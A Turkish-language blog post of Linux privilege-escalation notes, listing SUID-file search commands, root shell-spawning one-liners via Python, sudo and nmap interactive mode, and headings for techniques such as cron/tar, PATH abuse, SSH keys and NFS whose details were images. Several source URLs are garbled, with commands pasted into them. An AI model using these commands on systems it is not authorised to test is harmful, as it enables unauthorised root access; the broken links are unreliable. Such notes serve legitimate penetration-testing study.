Yetki Yükseltme

sudo -l

resim

yetki yükseltilebilecek dosyaları arama komutları

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm /4000

find / -user root -perm -4000 -exec ls -ldb {} \;

bir yetki yükseltme python komutu örneği;

usr/bin/python -c ‘import os; os.execl(“/bin/sh”,”sh”,”-p”)’

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

kaynak: https://gtfobins.github.io/gtfobifind usr/bin/python -c ‘import os; os.execl(“/bin/sh”,”sh”,”-p”)’/ -user root -perm /4000ns/python/

bir başka yetki yükseltme komutu:

sudo bash

Privilege Escalation with Path Variable Manipulation

find / -perm -u=s -type f 2>/dev/null

Find all the SUID/SGID executables on the Debian VM:

find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} \; 2> /dev/null

https://www.siberportal.org/red-tefind / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} \; 2> /dev/nullam/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/

Yetki Yükseltme Örnek-1 :

resim

python -c ‘import pty; pty.spawn(“/bin/sh”)’

resim

find / -perm -u=s -type f 2>/dev/null

resim

nmap –interactive

nmap> !sh

resim

Yetki Yükseltme Örnek-2 :

resim

Yetki Yükseltme Örnek-3 :

cron ve tar ile;

kaynak: https://tryhackme.com/ronmap –interactiveom/linuxprivesc

resim

Yetki Yükseltme Örnek-4 :

resim

Yetki Yükseltme Örnek-5 :

PATH ile;

resim

Yetki Yükseltme Örnek-6 :

bash version <4.2-048 ise;

resim

Yetki Yükseltme Örnek-7 :

resim

Yetki Yükseltme Örnek-8 :

“hidden history files” ile ;

resim

Yetki Yükseltme Örnek-9 :

“config files” ile ;

resim

Yetki Yükseltme Örnek-10 :

“root_keys - SSH Keys, backups ile;

resim

Yetki Yükseltme Örnek-11 :

“NFS servisi ile remote user;

resim

Yetki Yükseltme Örnek-12 :

“Linux Exploit Suggester 2 ile;

resim

created by @ahmetkara


<
Previous Post
Bruteforce VS Dictionary Attacks
>
Next Post
Phishing Emails